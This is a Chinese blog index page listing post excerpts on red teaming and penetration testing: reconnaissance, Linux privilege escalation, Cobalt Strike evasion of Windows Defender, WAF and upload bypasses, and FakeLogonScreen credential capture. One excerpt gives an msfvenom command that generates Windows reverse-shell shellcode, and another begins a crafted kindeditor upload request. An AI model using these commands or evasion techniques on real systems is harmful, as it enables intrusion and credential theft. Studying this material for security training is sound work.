摘要: 第3章 列举 贡献者:Hamza Mhirsi 翻译者 BugMan 介绍 攻击目标之前最重要的阶段是“侦察”。越努力 攻击者在此阶段投入攻击,成功的可能性就更大。之前 武器化阶段(获取权限),侦察分为四个阶段: 足迹 扫描 列举 漏洞评估 在枚举阶段,攻击者与目标建立活动连接并尝试获得有关它的实时 阅读全文
posted @ 2020-02-25 13:15 BugMan_Sec 阅读(286) 评论(0) 推荐(0) 编辑
摘要: 第四章 外部侦察 贡献者:Haythem Arfaoui 翻译BugMan 主动侦察 介绍 主动足迹涉及使用可以帮助您收集更多信息的工具和技术 有关目标的信息。与被动足迹不同的是,过程永远不会“触及” 目标,活动足迹涉及目标系统可能记录的任务,因此 隐身是关键。 NMAP 首先让我们快速介绍一下“ 阅读全文
posted @ 2020-02-25 13:13 BugMan_Sec 阅读(312) 评论(0) 推荐(0) 编辑
摘要: 第1章 红队和红队概述 贡献者:Tony Kelly @infosectdk # 翻译者 BugMan 什么是红队?它来自哪里? 红队的起源是军事起源。人们意识到,为了更好地防御, 需要攻击自己的防御系统以发现薄弱点,然后可以更好地防御.演变成“战争游戏”,其中后卫或友军标为蓝色, 敌军是红色的。R 阅读全文
posted @ 2020-02-22 18:33 BugMan_Sec 阅读(1698) 评论(0) 推荐(0) 编辑
摘要: 这里是Linux环境中特权升级的最常用技术: 内核 突破 以root身份运行的程序 安装的软件 弱密码 /重用密码 /纯文本密码 内部服务 Suid 配置错误 滥用sudo权利 由root调用的世界可写脚本 路径配置错误 Cronjobs 卸载的文件系统 内核利用 脏牛利用 此漏洞最初是通过HTTP 阅读全文
posted @ 2020-02-21 23:43 BugMan_Sec 阅读(660) 评论(0) 推荐(0) 编辑
摘要: MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Wind 阅读全文
posted @ 2020-02-21 20:28 BugMan_Sec 阅读(594) 评论(0) 推荐(1) 编辑
摘要: Cobalt Strike – Bypassing Windows Defender 混淆处理 对于所有红色团队成员来说,在交付有效的替代品同时又不拖延延展组织的所有风吹草动始终是一个挑战。就像所有其他安全解决方案一样,Windows Defender在检测由Cobalt Strike等工具生成的通 阅读全文
posted @ 2020-02-21 14:56 BugMan_Sec 阅读(853) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-02-21 14:22 BugMan_Sec 阅读(8) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-02-16 22:25 BugMan_Sec 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 上传绕过整理 WAF绕过 安全狗绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 2.通过替换大小写来进行绕过 3.通过删减空格来进行绕过 4.通过字符串拼接绕过 5.双文件上传绕过 6.HTTP header 属性值绕过 7.HTTP header 属性名称绕过 8.等效替换绕过 9.修改 阅读全文
posted @ 2020-02-16 22:21 BugMan_Sec 阅读(4634) 评论(0) 推荐(2) 编辑
摘要: 某一次小练习 1.存活主机 根据提示我们可以查看 可以看到8080端口开放 浏览器访问 单纯图片 扫描目录 访问manager 2.利用msf爆破· 3.Tomcat Manager经过身份验证的上载代码执行 成功反弹到shell flag1 阅读全文
posted @ 2020-02-16 22:04 BugMan_Sec 阅读(168) 评论(0) 推荐(0) 编辑
摘要: 探秘网络玄学 最近一次渗透的时候,和黑产同服务器的旁站突然发现一个"*宝典-pu卦"玄学网站,欧蕾亲娘,黑哥们这么有信仰的吗。怀着激动的心情,我看是了一次匪夷所思的探秘之路 1.正式的膜拜一下,表示尊重 对,没错,This is 前台。啥事都能算,瞧一瞧,看一看。 2.正面看完之后,我们可以从里面看 阅读全文
posted @ 2020-02-13 14:05 BugMan_Sec 阅读(369) 评论(0) 推荐(0) 编辑
摘要: kindeditor 爆绝对路径 双写文件名触发报错 ​​POST /Public/main/js/kindeditor/php/upload_json.php HTTP/1.1Host: jd.com03w345bwm3.s3136s.cnUser-Agent: Mozilla/5.0 (Maci 阅读全文
posted @ 2020-04-08 17:26 BugMan_Sec 阅读(426) 评论(0) 推荐(0) 编辑
摘要: 渗透知识点 1.信息收集 whois,网站IP,旁站,C段,服务器版本,容器版本,服务版本,数据库类型,二级域名,防火墙, 2.Mysql的网站注入,5.0以上和5.0以下有什么区别? 5.0以下没有information_schema这个系统表,无法列举表明,只能暴力跑表名,是单用户操作,5.0以 阅读全文
posted @ 2020-04-08 02:18 BugMan_Sec 阅读(366) 评论(0) 推荐(1) 编辑
摘要: 需要用到csc.exe,与InstallUtil.execsc.exe是微软.NET Framework 中的C#语言编译器InstallUtil.exe是安装Windows服务工具 关于两个文件默认安装位置:(注意x32,x64区别) C:\Windows\Microsoft.NET\Framew 阅读全文
posted @ 2020-03-26 11:20 BugMan_Sec 阅读(934) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-03-26 10:59 BugMan_Sec 阅读(18) 评论(0) 推荐(0) 编辑
摘要: Thinkphp 日志路径 3.2.3 http://xxxx/Runtime/Logs/Home/20_03_20.log http://xxxx//Application//Runtime/Logs/Admin/20_05_01.log 5.0.24 http://xxxx/Runtime/Lo 阅读全文
posted @ 2020-03-25 13:28 BugMan_Sec 阅读(4434) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-02-28 00:36 BugMan_Sec 阅读(0) 评论(0) 推荐(0) 编辑
摘要: FakeLogonScreen抓取Windows凭证 实践中使用的配置 攻击者: 操作系统: Kali Linux 2020.1 IP: 192.168.1.13 目标: 作业系统: Windows 10(Build 18363) IP: 192.168.1.11 情境 有一个系统与攻击者连接到相同 阅读全文
posted @ 2020-02-23 10:08 BugMan_Sec 阅读(463) 评论(0) 推荐(0) 编辑
摘要: 第2章开源情报(OSINT)侦察 贡献者:伊恩·巴维斯翻译:BugMan 哇,慢点牛仔吧!在我们深入探讨“做性感时光”(笑话)红队闻名的黑客冒险,还有一些作业要做。五分之一的专业人士从未学习或做过任何工作作业” 。关键的第一步,收集有关特定目标的信息,在操作范围内,允许攻击者发现潜在的突破并组织的防 阅读全文
posted @ 2020-02-22 19:14 BugMan_Sec 阅读(1065) 评论(0) 推荐(0) 编辑